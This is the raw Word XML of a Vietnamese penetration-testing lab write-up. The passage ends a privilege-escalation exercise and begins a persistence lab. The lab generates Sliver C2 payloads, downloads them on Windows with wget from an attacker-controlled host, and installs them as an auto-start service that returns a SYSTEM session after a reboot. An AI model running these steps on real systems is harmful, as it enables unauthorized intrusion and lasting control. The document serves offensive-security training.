                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6429375" cy="1181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="236ADDE7" w14:textId="401703CF" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Log on to Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7756F" w14:textId="77777777" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:r>
        <w:t xml:space="preserve">Log on to our Windows machine with our user credentials: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9415F6" w14:textId="204DE06D" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:r>
        <w:t>Username: notadmin Password: notadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6853C0" w14:textId="7537DDB4" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Xác nhận user được thêm vào chưa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F70B7" w14:textId="30D246CE" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF31140" wp14:editId="527E8E21">
            <wp:extent cx="6858000" cy="4083050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="940477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7174" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4083050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5ABACD" w14:textId="77533AA4" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:r>
        <w:t>Thành công thêm tài khoản john với quyền admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CE791" w14:textId="45FBD7F4" w:rsidR="00703BD4" w:rsidRDefault="00703BD4" w:rsidP="00703BD4">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B421CB" w14:textId="7853547E" w:rsidR="00703BD4" w:rsidRDefault="00703BD4" w:rsidP="00703BD4">
      <w:r w:rsidRPr="00A006D7">
        <w:t>Chúng t</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A006D7">
        <w:t xml:space="preserve"> đã xác định cách phát hiện và khai thác các lỗ hổng leo thang đặc quyền cục bộ bằng cách sử dụng beRoot và PowerUp. Bằng cách sử dụng những công cụ này, chúng t</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A006D7">
        <w:t xml:space="preserve"> có thể nâng cao đặc quyền của mình và tạo người dùng mới trên hệ thống với đặc quyền quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7A5FA5" w14:textId="77777777" w:rsidR="00703BD4" w:rsidRDefault="00703BD4" w:rsidP="00432AFC"/>
    <w:p w14:paraId="71B153B7" w14:textId="42280717" w:rsidR="00432AFC" w:rsidRPr="00703BD4" w:rsidRDefault="00703BD4" w:rsidP="00431D3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00703BD4">
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="00703BD4">
        <w:lastRenderedPageBreak/>
        <w:t>Lab 3.3: Persiste</w:t>
      </w:r>
      <w:r w:rsidR="00DB429F">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00703BD4">
        <w:t>ce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC50533" w14:textId="4DDDB9F2" w:rsidR="00703BD4" w:rsidRDefault="00703BD4" w:rsidP="00703BD4">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A341026" w14:textId="445D63D4" w:rsidR="00703BD4" w:rsidRDefault="00703BD4" w:rsidP="00703BD4">
      <w:r>
        <w:t>Tạo một dịch vụ mà nó sẽ tạo một phiên Sliver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58428A" w14:textId="2EA89ABA" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="00703BD4">
      <w:r>
        <w:t>Tạo user registry key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA2A3C" w14:textId="39D59DAC" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="00703BD4">
      <w:r>
        <w:t>Sử dụng bộ lọc WMI để phất hiện đăng nhập không thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493E60C" w14:textId="366A2FF6" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="008A4AD8">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F3CBA" w14:textId="743FD8AC" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="008A4AD8">
      <w:r>
        <w:t xml:space="preserve">Máy ảo sử dụng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B1804" w14:textId="5FB114F0" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="008A4AD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slingshot Linux VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04858041" w14:textId="73C03D75" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="008A4AD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5093310D" w14:textId="6CE0A837" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="008A4AD8">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47770A1D" w14:textId="3DF7D583" w:rsidR="008A4AD8" w:rsidRDefault="00E656D1" w:rsidP="008A4AD8">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thiết lập</w:t>
      </w:r>
      <w:r w:rsidR="008A4AD8">
        <w:t xml:space="preserve"> Sliver để có thể kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A61D7F" w14:textId="5613C5C8" w:rsidR="008A4AD8" w:rsidRDefault="008A4AD8" w:rsidP="008A4AD8">
      <w:r>
        <w:t xml:space="preserve">Đầu tiên ta cần </w:t>
      </w:r>
      <w:r w:rsidR="00E656D1">
        <w:t>thiết lập</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sliver để có thể kết nối. Chạy Sliver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BC15E5" w14:textId="6F116A96" w:rsidR="008A4AD8" w:rsidRDefault="00E656D1" w:rsidP="008A4AD8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A32F428" wp14:editId="5FCD5927">
            <wp:extent cx="5743575" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1012360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0503" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5743575" cy="3429000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7AC87" w14:textId="0E7FEDD5" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="008A4AD8">
      <w:r>
        <w:t>Thiết lập listener trên cổng 443 bằng cách chạy lệnh https để khởi động listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44859899" w14:textId="072B90F5" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="008A4AD8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D64C173" wp14:editId="0D5E2655">
            <wp:extent cx="3209925" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="13055213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1398" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3209925" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB3B86" w14:textId="45133AE4" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="008A4AD8">
      <w:r>
        <w:t>Bây giờ tiên hành tạo một số payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6F79C" w14:textId="6FD2539F" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Tạo Sliver payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37FF88" w14:textId="056ABB60" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:r>
        <w:t>Xem các option generate bằng cách chạy lệnh generate -h:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F36DF" w14:textId="4D5F1206" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="534361B2" wp14:editId="1D4155B2">
            <wp:extent cx="6858000" cy="469265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="165602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4760" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="469265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C966F2" w14:textId="7F4638FE" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:r>
        <w:t>Nhận thấy với option -f ta có thể tạo service. Hãy tạo 2 payloads, một để tạo service, một để thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E8EC3" w14:textId="20E2FC9A" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0173CA" wp14:editId="06FBE306">
            <wp:extent cx="6858000" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3995881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8160" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2499360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF8734" w14:textId="41B21F3D" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:r>
        <w:t>Bây giờ ta sẽ chuyển chúng qua window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F6868" w14:textId="3DA94C53" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Chuyển payloads qua windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7247C4" w14:textId="19F827B9" w:rsidR="00E656D1" w:rsidRDefault="00E656D1" w:rsidP="00E656D1">
      <w:r>
        <w:t xml:space="preserve">Hai file trên </w:t>
      </w:r>
      <w:r w:rsidR="00B13BD2">
        <w:t>giờ đã được sở hữu bởi root, xác minh bằng kiểm tra file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946BA98" w14:textId="223CBA15" w:rsidR="00B13BD2" w:rsidRDefault="00B13BD2" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EBB824C" wp14:editId="4A826474">
            <wp:extent cx="5334000" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="606844067" name="Picture 1" descr="A red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067" name="Picture 1" descr="A red line with numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="819150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CA9C6" w14:textId="08A50BED" w:rsidR="00B13BD2" w:rsidRDefault="00B13BD2" w:rsidP="00E656D1">
      <w:r>
        <w:t>Như ta thấy, 2 file có quyền đọc và ghi nhưng chỉ cho chủ sở hữu là root. Ta cần đổi chủ sở hữu sang sec560.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C546DC2" w14:textId="0CCF58C6" w:rsidR="00B13BD2" w:rsidRDefault="00B13BD2" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="098D4BA5" wp14:editId="0C9BB6C3">
            <wp:extent cx="5295900" cy="981075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1146973151"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3151" name="Picture 1" descr="A close-up of a code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5295900" cy="981075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57721845" w14:textId="2608DEA1" w:rsidR="00B13BD2" w:rsidRDefault="00B13BD2" w:rsidP="00E656D1">
      <w:r>
        <w:t>Bây giờ ta đã có thể chuyển file qua windows. Khởi động một websever đơn giản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84419B" w14:textId="4E232DEC" w:rsidR="00B13BD2" w:rsidRDefault="00B13BD2" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36A59AC4" wp14:editId="0A2F177D">
            <wp:extent cx="5276850" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16471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090" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276850" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B172D8" w14:textId="1A8C3C7E" w:rsidR="00C41407" w:rsidRDefault="00B13BD2" w:rsidP="00E656D1">
      <w:r>
        <w:t>Chuyển qua máy window và download 2 file về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4DC20B" w14:textId="499ECB39" w:rsidR="00C41407" w:rsidRDefault="00C41407" w:rsidP="00C41407">
      <w:r>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41407">
        <w:t>http://10.130.10.128:8000/payload.exe -OutFile payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669578F2" w14:textId="5A1CB658" w:rsidR="00C41407" w:rsidRDefault="00C41407" w:rsidP="00E656D1">
      <w:r>
        <w:t>wget http://10.130.10.128:8000/service.exe -OutFile service.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06690821" w14:textId="1CF289D8" w:rsidR="00B13BD2" w:rsidRDefault="002B52FA" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9EEB07" wp14:editId="2EAB30EE">
            <wp:extent cx="6372225" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="13154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0734" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6372225" cy="466725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCE39CE" w14:textId="7CB2C140" w:rsidR="00C41407" w:rsidRDefault="00C41407" w:rsidP="00E656D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70ACB25A" wp14:editId="2C431B83">
            <wp:extent cx="2619375" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="58005818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58184" name="Picture 1" descr="A blue screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2619375" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D498A" w14:textId="3F1552F0" w:rsidR="00C41407" w:rsidRDefault="00C41407" w:rsidP="00C41407">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Service Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E286C71" w14:textId="7F212F30" w:rsidR="00C41407" w:rsidRDefault="00C41407" w:rsidP="00C41407">
      <w:r>
        <w:t>Mở cmd với quyền admin và chạy lệnh dưới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D8AC77" w14:textId="44781244" w:rsidR="00C41407" w:rsidRDefault="00C41407" w:rsidP="00C41407">
      <w:r>
        <w:t>sc create persist binpath= "c:\Users\sec560\Desktop\service.exe" start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32C065" w14:textId="44F71F71" w:rsidR="002B52FA" w:rsidRDefault="002B52FA" w:rsidP="00C41407">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="577E15C7" wp14:editId="517C8E07">
            <wp:extent cx="6858000" cy="747395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55896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69910" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="747395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E948208" w14:textId="085CF805" w:rsidR="002B52FA" w:rsidRDefault="002B52FA" w:rsidP="002B52FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Bây giờ ta h</w:t>
      </w:r>
      <w:r w:rsidRPr="00A37A40">
        <w:t xml:space="preserve">ãy kiểm tra cơ chế </w:t>
      </w:r>
      <w:r w:rsidR="0035200F">
        <w:t>duy trì truy cập hệ thống</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A37A40">
        <w:t>Khởi động lại máy chủ Windows và bạn sẽ thấy phiên Sliver mới trên máy ảo Slingshot Linux của mình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F7ECA" w14:textId="33B0CF0F" w:rsidR="002B52FA" w:rsidRDefault="002B52FA" w:rsidP="00C41407">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210447F2" wp14:editId="21315AFC">
            <wp:extent cx="6858000" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15922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555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="428625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C508BC" w14:textId="6AD2CD97" w:rsidR="002B52FA" w:rsidRDefault="002B52FA" w:rsidP="00C41407">
      <w:r>
        <w:t xml:space="preserve">Tương tác với phiên này bằng cách sử dụng 2 ký tự đầu của ID sử dụng lệnh sessions -i. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F955EE4" w14:textId="4D28892F" w:rsidR="002B52FA" w:rsidRDefault="002B52FA" w:rsidP="00C41407">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2723A725" wp14:editId="3A068833">
            <wp:extent cx="6858000" cy="1097915"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="33438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6995" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1097915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761A374" w14:textId="2DAA5225" w:rsidR="002B52FA" w:rsidRDefault="00D05593" w:rsidP="00C41407">
      <w:r>
        <w:t>Kiểm tra mức độ truy cập bằng lệnh whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B83272" w14:textId="662FE785" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00C41407">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D1C3CA" wp14:editId="4850FA7E">
            <wp:extent cx="3781425" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="30041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2410" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3781425" cy="781050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898E2AA" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00237AEF">
        <w:t>Như bạn có thể thấy, dịch vụ chạy dưới dạ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ng SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00237AEF">
